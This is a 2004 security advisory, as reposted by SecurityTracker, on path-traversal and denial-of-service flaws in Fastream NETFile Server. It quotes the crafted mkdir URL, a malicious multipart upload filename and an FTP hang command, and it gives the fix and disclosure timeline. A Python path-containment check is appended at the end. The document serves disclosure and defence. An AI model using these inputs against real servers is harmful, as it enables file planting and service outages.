SecurityTracker.com
Category:  Application (Web Server/CGI) > Fastream NETFile Server
Vendors:  Fastream Technologies
Fastream NETFile Server 'mkdir' Command Lets Remote Users Upload Files to Arbitrary Locations
SecurityTracker Alert ID:  1010642
SecurityTracker URL:  http://securitytracker.com/id/1010642
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jul 4 2004
Impact:  Denial of service via network, Execution of arbitrary code via network, Modification of system information, Modification of user information, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s):  prior to 6.7.2.1085
Description:   at4r reported some input validation vulnerabilities in the Fastream NETFile server. A remote user can upload files to the target web server and potentially execute the files. A remote user can also cause denial of service conditions via the FTP service.

It is reported that a remote user can upload files with arbitrary contents to folders located outside of the root directory with a URL that contains two slashes, such as the following URL:

http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY

A remote user can create malicious files on the target system or overwrite critical files on the target system. This may allow a remote user to gain access to the target system, the report said.

It is also reported that a remote authenticated user can cause denial of service conditions via the FTP port by issuing the following command:

cd /////A

This will cause the target service to hang for a period of time.

The vendor was reportedly notified on July 3, 2004.

Impact:   A remote user can upload files to arbitrary locations on the target system.

A remote authenticated user can cause denial of service conditions on the FTP service.

Solution:   The vendor has released a fixed version (6.7.3), available at:

http://www.fastream.com/download.htm

Vendor URL:  www.fastream.com/download.htm
Cause:   Exception handling error, Input validation error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Sun, 4 Jul 2004 15:37:27 +0200
Subject:  Fastream NETFile FTP/Web Server Input validation Errors


Fastream NETFile FTP/Web Server Input validation Errors
--------------------------------------------------------

Release Date: 4 July 2004

Severity: High

Systems Affected: Fastream NETFile FTP/Web Server <=v.6.7.2.1085

Systems Not Affected: Fastream NETFile FTP/Web Server v6.7.3

Vendor URL: http://www.fastream.com/netfileserver.htm

Original Advisory: http://www.haxorcitos.com/Fastream_advisory.txt

Author: Andres Tarasco Acuna
email:  at4r @ haxorcitos.com
WEB:  www.haxorcitos.com







------------------
1. Description
------------------

Vendor's Description:

"Fastream NETFile Server is a secure FTP server and Web server combined
together in one application. Our claim is that it is the easiest to setup
and use server on the Internet!"
"Fastream NETFile FTP Server is a multi-threaded FTP server with virtual
links, quotas, U/D ratio and extremely fast directory and file caches.
Besides being a fast FTP server with full user and group based permissions
and file and directory cache, NETFile Server is also a Web server that is
developed for sharing files.

Fastream NETFile Web Server is a web server with full HTTP 1.1 compatibility
with support for multi-part downloads and keep-alive connections."









-------------------
2. Vulnerability
-------------------

There are some input validation errors in Fastream Netfile that allow users
to bypass the root directory restrictions.
Due to the fact that Fastream Netfile allows remote users to
upload/create/delete files in the application directory, it's easy to
exploit this vulnerability and compromise the system.
Another vulnerability was reported, in the way that Netfile handles some
URLs. After requesting a specially crafted directory it's possible to cause
a 1 minute Denial of Service.







-------------------
3. Exploit code
-------------------

The problem is in the way that Netfile handles two Slashes.
example URL:

http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY


C:\>dir FOLDE*
  Volume in drive C is W2000P
  Volume Serial Number is xxxx-xxxx

  Directory of C:\

07/03/2004  07:47p      <DIR>          FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
                0 File(s)              0 bytes
                1 Dir(s)     119,015,936 bytes free


Netfile allows some other methods in the "command" parameter, that could be
used to create/delete folders/files outside the Root directory.



To exploit the upload files vulnerability we need to take a look at the data
sent in the POST request:


-----------------------------7d42c98700ea
Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
Content-Type: text/plain

THIS IS AN EXAMPLE

-----------------------------7d42c98700ea--

It's possible for an attacker to modify the filename parameter to something
like: Filename="//..//autorun.inf" and place malicious files in the system,
or overwrite existing files.



Seems that the FTP Server is not vulnerable to this issue and transversal
directory attacks are not possible, but there is another bug that allows
malicious users to cause a denial of service by executing the following
command:

D:\>ftp localhost
Connected to at4r.intranet.
220 Fastream NETFile FTP Server Ready
User (at4r.intranet:(none)): ftp
331 Password required for ftp.
Password:
230 User ftp logged in.
ftp> cd /////A <-- here the ftp server hangs for a lot of time
599 No such directory.
ftp>





-----------------
4. Solution:
-----------------


The best solution is to upgrade the software to version 6.7.3 that was
released by vendor 3 July 2004.
Another way to minimize the impact of this vulnerability is to store the
root directory of Fastream netfile server on another partition and remove
create/delete file and directory permissions from all users, including
Guest accounts.



-------------------
5. Timeline
-------------------



DISCLOSURE TIMELINE:
-3 July, 2004: Vendor Contacted.
-3 July, 2004: Issue Fixed after 2 hours. New release 6.7.3 available
-4 July, 2004: Public Disclosure
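
Both web issues above (the `..//` value in the mkdir `filename` parameter and the `//..//autorun.inf` multipart filename) come down to resolving a client-supplied name against the served root. The following is an added example, not code from the advisory or the vendor, of a lexical containment check using Windows path rules; `ROOT`, `safe_join`, `upload_target` and `check` are hypothetical names, and junction or symlink checks are out of scope.

```python
import ntpath

class PathEscape(ValueError):
    """Client-supplied name would resolve outside the served root."""

def safe_join(root: str, client_path: str) -> str:
    """Lexically resolve client_path under root using Windows rules, or raise."""
    if "\x00" in client_path or ":" in client_path:
        raise PathEscape(f"drive, stream or NUL in {client_path!r}")
    stack = []
    # Treat both separators alike; empty segments come from doubled slashes.
    for seg in client_path.replace("/", "\\").split("\\"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                raise PathEscape(f"{client_path!r} climbs above the root")
            stack.pop()
            continue
        if seg != seg.rstrip(". "):
            # Win32 strips trailing dots and spaces, so ".. " would become "..".
            raise PathEscape(f"ambiguous segment {seg!r}")
        stack.append(seg)
    if not stack:
        raise PathEscape("empty path")
    return ntpath.join(root, *stack)

def upload_target(root: str, form_filename: str) -> str:
    """Keep only the final component of a multipart filename, then join."""
    leaf = form_filename.replace("/", "\\").rsplit("\\", 1)[-1]
    return safe_join(root, leaf)

ROOT = r"C:\netfile\root"  # hypothetical served root (assumption)

def check(func, value):
    """Return the resolved path, or a 'rejected: ...' string on refusal."""
    try:
        return func(ROOT, value)
    except PathEscape as exc:
        return f"rejected: {exc}"

if __name__ == "__main__":
    # Constructed inputs modelled on the values quoted in the advisory.
    for v in ("docs/new", "..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY", "a/..//..//b"):
        print("mkdir ", v, "->", check(safe_join, v))
    for v in (r"D:\foo.txt", "//..//autorun.inf"):
        print("upload", v, "->", check(upload_target, v))
```
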



 
 



Copyright 2013, SecurityGlobal.net LLC